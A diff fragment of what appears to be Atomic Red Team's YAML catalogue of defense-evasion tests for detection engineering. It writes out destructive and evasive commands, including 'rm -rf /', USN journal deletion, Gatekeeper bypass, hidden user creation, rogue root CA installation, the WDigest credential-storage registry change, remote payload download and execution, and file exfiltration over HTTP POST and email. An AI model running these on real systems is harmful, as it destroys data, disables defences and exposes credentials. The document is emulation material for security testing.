+' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null - ' +' executor: command: 'Remove-Item -path #{file_to_delete} - ' +' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 
@@ -27476,7 +27476,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -27490,18 +27490,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) - ' +' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null - ' +' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse - ' +' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 @@ -27509,13 +27509,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - ' +' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null - ' +' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb @@ -27528,7 +27528,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) - ' +' name: powershell elevation_required: true - name: Delete TeamViewer Log Files @@ -27552,18 +27552,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) - ' +' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null - ' +' executor: command: 'Remove-Item #{teamviewer_log_file} - ' +' name: powershell T1222: technique: @@ -27708,7 +27708,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line - ' +' supported_platforms: - macos input_arguments: 
@@ -27719,7 +27719,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} - ' +' elevation_required: true name: sh T1484.001: @@ -27947,7 +27947,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos @@ -27957,20 +27957,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 @@ -27988,20 +27988,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) - ' +' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} - ' +' executor: command: 'attrib.exe +s #{file_to_modify} - ' +' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib 
@@ -28020,27 +28020,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) - ' +' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} - ' +' executor: command: 'attrib.exe +h #{file_to_modify} - ' +' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments: @@ -28051,13 +28051,13 @@ defense-evasion: executor: command: 'setfile -a V #(unknown) - ' +' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor: @@ -28066,22 +28066,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt - ' +' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' name: sh T1564.002: technique: @@ -28129,7 +28129,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) - ' +' supported_platforms: - macos input_arguments: 
@@ -28140,17 +28140,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 - ' +' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} - ' +' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin - ' +' supported_platforms: - macos input_arguments: @@ -28161,10 +28161,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 - ' +' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} - ' +' elevation_required: true name: sh T1564.003: @@ -28246,7 +28246,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} - ' +' name: powershell T1564: technique: @@ -28330,7 +28330,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -28340,7 +28340,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") @@ -28350,7 +28350,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore - ' +' name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 @@ -28525,7 +28525,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells - ' +' supported_platforms: - linux - macos 
@@ -28691,7 +28691,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files - ' +' supported_platforms: - linux input_arguments: @@ -28726,7 +28726,7 @@ defense-evasion: auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. - ' +' supported_platforms: - linux input_arguments: @@ -28871,10 +28871,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: - ' +' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: - ' +' name: command_prompt elevation_required: true T1202: @@ -28970,7 +28970,7 @@ defense-evasion: executor: command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process} - ' +' name: command_prompt - name: Indirect Command Execution - conhost.exe auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 @@ -28988,7 +28988,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" - ' +' name: command_prompt T1553.004: technique: @@ -29088,7 +29088,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -29115,7 +29115,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -29131,10 +29131,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} 
@@ -29148,7 +29148,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl - ' +' supported_platforms: - macos input_arguments: @@ -29164,10 +29164,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29175,14 +29175,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" - ' +' name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell - ' +' supported_platforms: - windows input_arguments: @@ -29194,10 +29194,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29219,7 +29219,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil - ' +' supported_platforms: - windows input_arguments: 
@@ -29231,10 +29231,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) - ' +' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29242,7 +29242,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} - ' +' cleanup_command: | try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My @@ -29331,10 +29331,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29399,10 +29399,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29445,7 +29445,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: 
@@ -29470,10 +29470,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29516,7 +29516,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29541,10 +29541,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29587,7 +29587,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29612,10 +29612,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" 
@@ -29659,7 +29659,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29684,10 +29684,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29730,7 +29730,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. - ' +' supported_platforms: - windows input_arguments: @@ -29755,10 +29755,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29812,10 +29812,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" 
@@ -29997,7 +29997,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -30013,14 +30013,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -30036,14 +30036,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -30059,14 +30059,14 @@ defense-evasion: executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -30082,14 +30082,14 @@ defense-evasion: executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. - ' +' supported_platforms: - macos - linux 
@@ -30109,14 +30109,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. - ' +' supported_platforms: - macos - linux @@ -30136,13 +30136,13 @@ defense-evasion: executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. - ' +' supported_platforms: - macos - linux @@ -30158,13 +30158,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. - ' +' supported_platforms: - macos - linux @@ -30180,7 +30180,7 @@ defense-evasion: executor: command: 'chown -R #{owner} #{file_or_folder} - ' +' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f @@ -30198,7 +30198,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} - ' +' name: sh T1078.003: technique: @@ -30322,7 +30322,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. - ' +' supported_platforms: - windows input_arguments: 
@@ -30342,10 +30342,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) - ' +' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#(unknown)" @@ -30358,7 +30358,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. - ' +' supported_platforms: - windows input_arguments: @@ -30378,10 +30378,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) - ' +' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#(unknown)" @@ -30504,7 +30504,7 @@ defense-evasion: Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ - ' +' supported_platforms: - windows input_arguments: 
@@ -30516,20 +30516,20 @@ defense-evasion: dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) - ' +' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" - ' +' cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null - ' +' name: powershell - name: Mount an ISO image and run executable from the ISO auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc @@ -30551,10 +30551,10 @@ defense-evasion: dependencies: - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) - ' +' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" @@ -30588,18 +30588,18 @@ defense-evasion: - description: A test file with the Zone.Identifier attribute must be present. prereq_command: 'if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 } - ' +' get_prereq_command: | Invoke-WebRequest #{file_to_download} -OutFile #{file_path} Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3' executor: command: 'Unblock-File -Path #{file_path} - ' +' cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value ''[ZoneTransfer]'',''ZoneId=3'' - ' +' name: powershell T1036.004: technique: 
@@ -30675,7 +30675,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f - ' +' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc @@ -30690,7 +30690,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times - ' +' name: command_prompt elevation_required: true T1036: @@ -30840,7 +30840,7 @@ defense-evasion: description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) - ' +' supported_platforms: - macos - linux @@ -31089,11 +31089,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f - ' +' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Modify Registry of Local Machine - cmd @@ -31113,11 +31113,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f - ' +' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials @@ -31132,11 +31132,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f - ' +' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone 
@@ -31177,11 +31177,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "''" - ' +' name: command_prompt T1218.007: technique: @@ -31683,7 +31683,7 @@ defense-evasion: description: 'Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. - ' +' supported_platforms: - windows input_arguments: @@ -31695,17 +31695,17 @@ defense-evasion: dependencies: - description: 'T1218.msi must exist on disk at specified location (#{msi_payload}) - ' +' prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own MSI" - ' +' executor: command: 'msiexec.exe /q /i "#{msi_payload}" - ' +' name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 @@ -31713,7 +31713,7 @@ defense-evasion: in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. - ' +' supported_platforms: - windows input_arguments: @@ -31724,7 +31724,7 @@ defense-evasion: executor: command: 'msiexec.exe /q /i "#{msi_payload}" - ' +' name: command_prompt - name: Msiexec.exe - Execute Arbitrary DLL auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec @@ -31743,17 +31743,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'msiexec.exe /y "#{dll_payload}" - ' +' name: command_prompt T1564.004: technique: 
@@ -31893,7 +31893,7 @@ defense-evasion: Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore - ' +' name: powershell - name: Create ADS command prompt auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb @@ -31917,7 +31917,7 @@ defense-evasion: for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' name: command_prompt - name: Create ADS PowerShell auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 @@ -31939,13 +31939,13 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'New-Item -Path #{file_name} | Out-Null - ' +' executor: command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" @@ -31953,7 +31953,7 @@ defense-evasion: set-content -path . -stream #{ads_filename} -value "test3" cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' name: powershell T1599.001: technique: @@ -32162,7 +32162,7 @@ defense-evasion: auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 description: 'Add a Network Share utilizing the command_prompt - ' +' supported_platforms: - windows input_arguments: @@ -32179,7 +32179,7 @@ defense-evasion: auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222' description: 'Removes a Network Share utilizing the command_prompt - ' +' supported_platforms: - windows input_arguments: 
@@ -32190,13 +32190,13 @@ defense-evasion: executor: command: 'net share #{share_name} /delete - ' +' name: command_prompt - name: Remove Network Share PowerShell auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 description: 'Removes a Network Share utilizing PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -32443,14 +32443,14 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} - ' +' name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: 'Mimic execution of compressed executable. When successfully executed, calculator.exe will open. - ' +' supported_platforms: - windows input_arguments: @@ -32462,11 +32462,11 @@ defense-evasion: dependencies: - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe - ' +' prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" @@ -32474,7 +32474,7 @@ defense-evasion: executor: command: '"%temp%\temp_T1027.zip\T1027.exe" - ' +' cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul @@ -32508,7 +32508,7 @@ defense-evasion: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' -Attachments #{input_file} -SmtpServer #{smtp_server} - ' +' name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 @@ -32529,7 +32529,7 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} - ' +' name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f 
